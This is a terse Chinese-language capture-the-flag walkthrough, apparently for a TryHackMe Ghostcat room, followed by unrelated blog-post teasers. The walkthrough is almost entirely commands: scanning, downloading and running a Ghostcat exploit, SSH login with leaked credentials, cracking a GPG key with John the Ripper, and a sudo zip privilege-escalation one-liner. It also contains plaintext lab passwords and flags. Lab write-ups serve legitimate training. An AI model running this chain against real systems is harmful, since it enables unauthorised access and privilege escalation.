nmap -A 10.10.9.138
searchsploit AJP
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion
wget https://www.exploit-db.com/download/48143
mv 48143 48143.py
python 48143.py
skyfuck
8730281lkjlkjdqlksalks
ssh [email protected]
scp -r [email protected]:/home/skyfuck .
/home/merlin
发现 user.txt
THM{GhostCat_1s_so_cr4sy}
我们刚刚下载到一个 asc 档案 跟一个 pgp 档案
file
观察他们是什麽.pgp
是加密後ㄉ东西.asc
的是 private keypgp 转 john
gpg2john tryhackme.asc > john_gpg
.asc
的 private key 档案求密码用 john 爆破,With rockyou.txt
john john_gpg --wordlist=/opt/rockyou.txt
alexandru
gpg --decrypt credential.pgp
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
su merlin
sudo -l
(root : root) NOPASSWD: /usr/bin/zip
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
root.txt
: THM{Z1P_1S_FAKE}
<<: Day 16 : Remove Nth Node From End of List
上一篇提到 JavaScript 是弱型别语言。 强型别语言在变数被宣告的时候必须指定资料型别给它,...
这篇要进入到资料的世界,认识Buffer(缓冲)与Stream(串流),让之後要学的通讯协定及资料传...
弱点扫描(机器扫描) 蒐集对方系统资讯,可透过工具列举出易受攻击的弱点 上图取自台科大资安社课教材 ...
在 Vue 中,使用了基於HMTL的模板,这种模板与允许开发者声明式地将 DOM 绑定至底层 Vue...
使用量身定制的品牌徽标制作工具 Visual Paradigm Online,您只需单击几下即可设计...